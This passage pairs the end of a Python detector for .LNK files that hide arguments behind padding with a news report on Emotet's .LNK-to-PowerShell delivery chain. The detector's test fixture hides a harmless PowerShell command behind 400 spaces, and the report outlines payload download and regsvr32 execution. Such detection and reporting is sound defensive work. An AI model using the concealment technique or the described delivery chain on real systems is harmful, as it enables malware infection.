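        if struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
            raise ValueError("not a shell link")
        flags = struct.unpack_from("<I", data, 20)[0]
        pos = 76                                  # fixed header size
        if flags & HAS_ID_LIST:                   # IDListSize excludes itself
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINK_INFO:                 # LinkInfoSize includes itself
            pos += struct.unpack_from("<I", data, pos)[0]
        width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
        # StringData fields appear in this order, each only if its flag is set
        for bit in (HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS):
            if not flags & bit:
                continue
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2: pos + 2 + count * width]
            if len(raw) != count * width:
                raise ValueError("truncated StringData")
            if bit == HAS_ARGS:
                return raw.decode(codec, errors="replace")
            pos += 2 + count * width
        return ""
    except struct.error as exc:
        raise ValueError("truncated shell link") from exc


def assess(args: str, visible_chars: int = 260) -> list:
    """List reasons the argument string deserves a closer look."""
    findings = []
    pad = PAD_RUN.search(args)
    if pad:
        findings.append(
            f"padding: {pad.end() - pad.start()} blank/NUL chars at offset {pad.start()}")
    # Assumption: the properties dialog shows only the first visible_chars characters
    if args[visible_chars:].strip(" \t\r\n\x00"):
        findings.append(f"content beyond the first {visible_chars} chars")
    hits = [k for k in KEYWORDS if k in args.lower()]
    if hits:
        findings.append("references " + ", ".join(hits))
    return findings


def constructed_lnk(args: str) -> bytes:
    """Constructed fixture: header plus arguments only, with no link target."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_ARGS | IS_UNICODE)
    return header.ljust(76, b"\x00") + struct.pack("<H", len(args)) \
        + args.encode("utf-16-le")


# Constructed sample: harmless command pushed out of view by 400 spaces
SAMPLE_ARGS = " " * 400 + 'powershell.exe -Command "Write-Output constructed-sample"'

if __name__ == "__main__":
    for line in assess(lnk_arguments(constructed_lnk(SAMPLE_ARGS))):
        print(line)
```
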

Emotet’s malicious .LNK file includes the URLs of several compromised websites used to store the PowerShell script payload. If the script is present in one of the defined locations, it is downloaded to the system temporary folder as a PowerShell script with a random name.

Below is the deobfuscated version of the Emotet malicious string attached to the .LNK payload:

[Figure: Malicious string of Emotet with PowerShell commands attached to LNK file. Source: BleepingComputer]

This script generates and launches another PowerShell script that downloads the Emotet malware from a list of compromised sites and saves it to the %Temp% folder. The downloaded DLL is then executed using the regsvr32.exe command.

This execution flow starts with the PowerShell script and ends with the Emotet malware being downloaded and launched through the Regsvr32.exe command-line utility.

Security researcher Max Malyutin notes that, in addition to the use of PowerShell in LNK files, this execution flow is new for deploying Emotet malware.

A booming new technique

Research group Cryptolaemus, which closely monitors Emotet activity, notes that the new technique is a clear attempt by the threat actor to circumvent defenses and automated detection.

Security researchers from cybersecurity firm ESET have also noticed that the use of the new Emotet technique has increased over the past 24 hours.

Telemetry data from ESET shows that the countries most affected by Emotet via the new technique are Mexico, Italy, Japan, Turkey and Canada.

Besides the switch to PowerShell in .LNK files, Emotet botnet operators have made a few other changes since resuming business at more stable levels in November, such as moving to 64-bit modules.

The malware is usually used as a gateway for other malware, especially ransomware threats like Conti.
